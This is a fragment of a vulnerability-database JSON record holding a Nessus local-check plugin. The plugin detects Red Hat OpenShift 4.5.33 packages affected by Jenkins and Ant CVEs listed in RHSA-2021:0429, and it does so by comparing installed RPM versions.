"ASA-202101-41", "ASA-202012-5"], "type": "archlinux"}, {"idList": ["GLSA-202007-34", "GLSA-202011-18"], "type": "gentoo"}, {"idList": ["PHOTONOS_PHSA-2020-2_0-0291_APACHE.NASL", "EULEROS_SA-2021-1133.NASL", "FEDORA_2020-92B1D001B3.NASL", "FREEBSD_PKG_D6F76976E86D4F9A936276C849B10DB2.NASL", "JENKINS_2_274.NASL", "REDHAT-RHSA-2021-0423.NASL", "FEDORA_2020-2640AA4E19.NASL", "JENKINS_2_276.NASL", "FREEBSD_PKG_425F214388764B0AAF84E0238C5C2062.NASL", "PHOTONOS_PHSA-2020-1_0-0335_APACHE.NASL"], "type": "nessus"}, {"idList": ["RHSA-2021:0429", "RHSA-2020:4961", "RHSA-2021:0637", "RHSA-2021:0423", "RHSA-2020:4960", "RHSA-2020:2618"], "type": "redhat"}], "rev": 2}, "score": {"modified": "2021-03-05T06:17:14", "rev": 2, "value": 6.4, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "147015", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0429. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147015);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/03\");\n\n script_cve_id(\n \"CVE-2020-1945\",\n \"CVE-2020-11979\",\n \"CVE-2021-21602\",\n \"CVE-2021-21603\",\n \"CVE-2021-21604\",\n \"CVE-2021-21605\",\n \"CVE-2021-21606\",\n \"CVE-2021-21607\",\n \"CVE-2021-21608\",\n \"CVE-2021-21609\",\n \"CVE-2021-21610\",\n \"CVE-2021-21611\",\n \"CVE-2021-21615\"\n );\n script_xref(name:\"RHSA\", value:\"2021:0429\");\n\n script_name(english:\"RHEL 7 / 8 : OpenShift Container Platform 4.5.33 packages and (RHSA-2021:0429)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0429 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: Excessive memory allocation in graph URLs leads to denial of service (CVE-2021-21607)\n\n - jenkins: Stored XSS vulnerability in button labels (CVE-2021-21608)\n\n - jenkins: Missing permission check for paths with specific prefix (CVE-2021-21609)\n\n - jenkins: Reflected XSS vulnerability in markup formatter preview (CVE-2021-21610)\n\n - jenkins: Stored XSS vulnerability on new item page (CVE-2021-21611)\n\n - jenkins: Filesystem traversal by privileged users (CVE-2021-21615)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/20.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/22.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/59.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/79.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/377.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/502.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/770.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/863.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-1945\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2020-11979\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21602\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21603\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21605\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21606\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21607\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21608\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21609\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21610\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21611\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-21615\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0429\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1837444\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1903702\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1921322\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925140\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925141\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925143\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925145\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925151\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925156\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925157\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925159\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1925161\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-21605\");\n script_cwe_id(20, 22, 59, 79, 377, 502, 770, 863);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.1::el7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.1::el8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.2::el7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.2::el8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.3::el7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.3::el8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.4::el7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.4::el8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.5::el7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.5::el8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.6::el7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.6::el8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.7::el7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:redhat:openshift:4.7::el8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:conmon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:machine-config-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-ansible\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-ansible-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-clients-redistributable\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openshift-hyperkube\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:runc\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release_list(operator: 'ge', os_version: os_ver, rhel_versions: ['7','8'])) audit(AUDIT_OS_NOT, 'Red Hat 7.x / 8.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'openshift_4_1_el7': [\n 'rhel-7-server-ose-4.1-debug-rpms',\n 'rhel-7-server-ose-4.1-rpms',\n 'rhel-7-server-ose-4.1-source-rpms'\n ],\n 'openshift_4_1_el8': [\n 'rhocp-4.1-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.1-for-rhel-8-x86_64-rpms',\n 'rhocp-4.1-for-rhel-8-x86_64-source-rpms'\n ],\n 'openshift_4_2_el7': [\n 'rhel-7-for-system-z-ose-4.2-debug-rpms',\n 'rhel-7-for-system-z-ose-4.2-rpms',\n 'rhel-7-for-system-z-ose-4.2-source-rpms',\n 'rhel-7-server-ose-4.2-debug-rpms',\n 'rhel-7-server-ose-4.2-rpms',\n 'rhel-7-server-ose-4.2-source-rpms'\n ],\n 'openshift_4_2_el8': [\n 'rhocp-4.2-for-rhel-8-s390x-debug-rpms',\n 'rhocp-4.2-for-rhel-8-s390x-rpms',\n 'rhocp-4.2-for-rhel-8-s390x-source-rpms',\n 'rhocp-4.2-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.2-for-rhel-8-x86_64-rpms',\n 'rhocp-4.2-for-rhel-8-x86_64-source-rpms'\n ],\n 'openshift_4_3_el7': [\n 'rhel-7-for-system-z-ose-4.3-debug-rpms',\n 'rhel-7-for-system-z-ose-4.3-rpms',\n 'rhel-7-for-system-z-ose-4.3-source-rpms',\n 'rhel-7-server-ose-4.3-debug-rpms',\n 'rhel-7-server-ose-4.3-rpms',\n 'rhel-7-server-ose-4.3-source-rpms'\n ],\n 'openshift_4_3_el8': [\n 'rhocp-4.3-for-rhel-8-s390x-debug-rpms',\n 'rhocp-4.3-for-rhel-8-s390x-rpms',\n 'rhocp-4.3-for-rhel-8-s390x-source-rpms',\n 'rhocp-4.3-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.3-for-rhel-8-x86_64-rpms',\n 'rhocp-4.3-for-rhel-8-x86_64-source-rpms'\n ],\n 'openshift_4_4_el7': [\n 'rhel-7-for-system-z-ose-4.4-debug-rpms',\n 'rhel-7-for-system-z-ose-4.4-rpms',\n 'rhel-7-for-system-z-ose-4.4-source-rpms',\n 'rhel-7-server-ose-4.4-debug-rpms',\n 'rhel-7-server-ose-4.4-rpms',\n 'rhel-7-server-ose-4.4-source-rpms'\n ],\n 'openshift_4_4_el8': [\n 'rhocp-4.4-for-rhel-8-s390x-debug-rpms',\n 'rhocp-4.4-for-rhel-8-s390x-rpms',\n 'rhocp-4.4-for-rhel-8-s390x-source-rpms',\n 'rhocp-4.4-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.4-for-rhel-8-x86_64-rpms',\n 'rhocp-4.4-for-rhel-8-x86_64-source-rpms'\n ],\n 'openshift_4_5_el7': [\n 'rhel-7-for-system-z-ose-4.5-debug-rpms',\n 'rhel-7-for-system-z-ose-4.5-rpms',\n 'rhel-7-for-system-z-ose-4.5-source-rpms',\n 'rhel-7-server-ose-4.5-debug-rpms',\n 'rhel-7-server-ose-4.5-rpms',\n 'rhel-7-server-ose-4.5-source-rpms'\n ],\n 'openshift_4_5_el8': [\n 'rhocp-4.5-for-rhel-8-s390x-debug-rpms',\n 'rhocp-4.5-for-rhel-8-s390x-rpms',\n 'rhocp-4.5-for-rhel-8-s390x-source-rpms',\n 'rhocp-4.5-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.5-for-rhel-8-x86_64-rpms',\n 'rhocp-4.5-for-rhel-8-x86_64-source-rpms'\n ],\n 'openshift_4_6_el7': [\n 'rhel-7-for-system-z-ose-4.6-rpms',\n 'rhel-7-server-ose-4.6-debug-rpms',\n 'rhel-7-server-ose-4.6-rpms',\n 'rhel-7-server-ose-4.6-source-rpms'\n ],\n 'openshift_4_6_el8': [\n 'rhocp-4.6-for-rhel-8-s390x-debug-rpms',\n 'rhocp-4.6-for-rhel-8-s390x-rpms',\n 'rhocp-4.6-for-rhel-8-s390x-source-rpms',\n 'rhocp-4.6-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.6-for-rhel-8-x86_64-rpms',\n 'rhocp-4.6-for-rhel-8-x86_64-source-rpms'\n ],\n 'openshift_4_7_el7': [\n 'rhel-7-for-system-z-ose-4.7-rpms',\n 'rhel-7-server-ose-4.7-debug-rpms',\n 'rhel-7-server-ose-4.7-rpms',\n 'rhel-7-server-ose-4.7-source-rpms'\n ],\n 'openshift_4_7_el8': [\n 'rhocp-4.7-for-rhel-8-s390x-debug-rpms',\n 'rhocp-4.7-for-rhel-8-s390x-rpms',\n 'rhocp-4.7-for-rhel-8-s390x-source-rpms',\n 'rhocp-4.7-for-rhel-8-x86_64-debug-rpms',\n 'rhocp-4.7-for-rhel-8-x86_64-rpms',\n 'rhocp-4.7-for-rhel-8-x86_64-source-rpms'\n ]\n};\n\nfound_repos = NULL;\nhost_repo_list = get_kb_list('Host/RedHat/repo-list/*');\nif (!(empty_or_null(host_repo_list))) {\n found_repos = make_list();\n foreach repo_key (keys(repositories)) {\n foreach repo ( repositories[repo_key] ) {\n if (get_kb_item('Host/RedHat/repo-list/' + repo)) {\n append_element(var:found_repos, value:repo_key);\n break;\n }\n }\n }\n if(empty_or_null(found_repos)) audit(AUDIT_RHSA_NOT_AFFECTED, 'RHSA-2021:0429');\n}\n\npkgs = [\n {'reference':'conmon-2.0.21-1.rhaos4.5.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'conmon-2.0.21-1.rhaos4.5.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'jenkins-2.263.3.1612434332-1.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'openshift-ansible-4.5.0-202102031005.p0.git.0.c6839a2.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'openshift-ansible-test-4.5.0-202102031005.p0.git.0.c6839a2.el7', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'openshift-clients-redistributable-4.5.0-202102051529.p0.git.3612.61b096a.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el7', 'cpu':'s390x', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el7', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el7', 'openshift_4_2_el7', 'openshift_4_3_el7', 'openshift_4_4_el7', 'openshift_4_5_el7', 'openshift_4_6_el7', 'openshift_4_7_el7']},\n {'reference':'conmon-2.0.21-1.rhaos4.5.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'conmon-2.0.21-1.rhaos4.5.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'epoch':'2', 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'machine-config-daemon-4.5.0-202102050524.p0.git.2594.ff3b8c0.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'machine-config-daemon-4.5.0-202102050524.p0.git.2594.ff3b8c0.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'openshift-clients-4.5.0-202102051529.p0.git.3612.61b096a.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'openshift-clients-redistributable-4.5.0-202102051529.p0.git.3612.61b096a.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'openshift-hyperkube-4.5.0-202102050524.p0.git.0.9229406.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'runc-1.0.0-72.rhaos4.5.giteadfc6b.el8', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']},\n {'reference':'runc-1.0.0-72.rhaos4.5.giteadfc6b.el8', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['openshift_4_1_el8', 'openshift_4_2_el8', 'openshift_4_3_el8', 'openshift_4_4_el8', 'openshift_4_5_el8', 'openshift_4_6_el8', 'openshift_4_7_el8']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = FALSE;\n if (empty_or_null(found_repos))\n {\n repocheck = TRUE;\n }\n else\n {\n foreach repo (repo_list) {\n if (contains_element(var:found_repos, value:repo))\n {\n repocheck = TRUE;\n break;\n }\n }\n }\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(host_repo_list)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'conmon / jenkins / machine-config-daemon / openshift-ansible / etc');\n}\n", "naslFamily": "Red Hat Local Security Checks", "cpe": ["cpe:/a:redhat:openshift:4.5::el8", "cpe:/a:redhat:openshift:4.7", "cpe:/a:redhat:openshift:4.3::el7", "cpe:/a:redhat:openshift:4.4", "cpe:/a:redhat:openshift:4.4::el7", "cpe:/a:redhat:openshift:4.6::el7", "p-cpe:/a:redhat:enterprise_linux:machine-config-daemon", "cpe:/a:redhat:openshift:4.3", "cpe:/a:redhat:openshift:4.5", "p-cpe:/a:redhat:enterprise_linux:jenkins", "cpe:/a:redhat:openshift:4.2::el8", "cpe:/a:redhat:openshift:4.1", "cpe:/a:redhat:openshift:4.7::el7", "cpe:/a:redhat:openshift:4.1::el7", "cpe:/a:redhat:openshift:4.6::el8", "cpe:/a:redhat:openshift:4.4::el8", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:runc", "cpe:/a:redhat:openshift:4.3::el8", "cpe:/a:redhat:openshift:4.2", "p-cpe:/a:redhat:enterprise_linux:conmon", "cpe:/a:redhat:openshift:4.6", "cpe:/a:redhat:openshift:4.5::el7", "p-cpe:/a:redhat:enterprise_linux:openshift-ansible-test", "p-cpe:/a:redhat:enterprise_linux:openshift-ansible", "p-cpe:/a:redhat:enterprise_linux:openshift-clients", "cpe:/a:redhat:openshift:4.7::el8", "cpe:/a:redhat:openshift:4.2::el7", "p-cpe:/a:redhat:enterprise_linux:openshift-hyperkube", "p-cpe:/a:redhat:enterprise_linux:openshift-clients-redistributable", "cpe:/o:redhat:enterprise_linux:8", "cpe:/a:redhat:openshift:4.1::el8"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2021-03-05T06:17:14", "differentElements": ["sourceData"], "edition": 1}, {"bulletin": {"id": "REDHAT-RHSA-2021-0429.NASL", "hash": "dd9aac88a6250fbd4e3eb9acf759dc529eaa00e235ce009ae5cac4fb67211e01", "type": "nessus", "bulletinFamily": "scanner", "title": "RHEL 7 / 8 : OpenShift Container Platform 4.5.33 packages and (RHSA-2021:0429)", "description": "The remote Redhat Enterprise Linux 7 / 8 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the RHSA-2021:0429 advisory.\n\n - ant: insecure temporary file (CVE-2020-11979)\n\n - ant: insecure temporary file vulnerability (CVE-2020-1945)\n\n - jenkins: Arbitrary file read vulnerability in workspace browsers (CVE-2021-21602)\n\n - jenkins: XSS vulnerability in notification bar (CVE-2021-21603)\n\n - jenkins: Improper handling of REST API XML deserialization errors (CVE-2021-21604)\n\n - jenkins: Path traversal vulnerability in agent names (CVE-2021-21605)\n\n - jenkins: Arbitrary file existence check in file fingerprints (CVE-2021-21606)\n\n - jenkins: 